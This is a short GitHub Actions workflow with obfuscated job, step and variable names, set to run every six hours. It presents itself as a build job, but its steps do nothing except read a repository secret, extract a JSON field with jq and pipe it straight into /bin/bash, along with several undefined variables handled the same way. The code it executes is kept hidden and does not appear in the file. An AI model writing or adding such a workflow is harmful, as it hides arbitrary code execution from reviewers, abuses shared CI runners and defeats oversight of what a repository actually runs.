name: wznkhi
on:
  workflow_dispatch:
  schedule:
    - cron: '13 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wznkhi
        env:
          pfuwb200: ${{ secrets.pfuwb200 }}
        run: |
          echo $pfuwb200 | jq -r .axtwl08 | /bin/bash
          echo $m26 | jq -r .mzl366 | /bin/bash
          echo $yxl933 | jq -r .bh6608 | /bin/bash
          echo $qbwn3012 | jq -r .b1709 | /bin/bash
          echo $zv06 | jq -r .mho582 | /bin/bash
          echo $lume3 | jq -r .s3 | /bin/bash
          echo $sab63 | jq -r .gr36 | /bin/bash
          echo $u0 | jq -r .ryp0 | /bin/bash

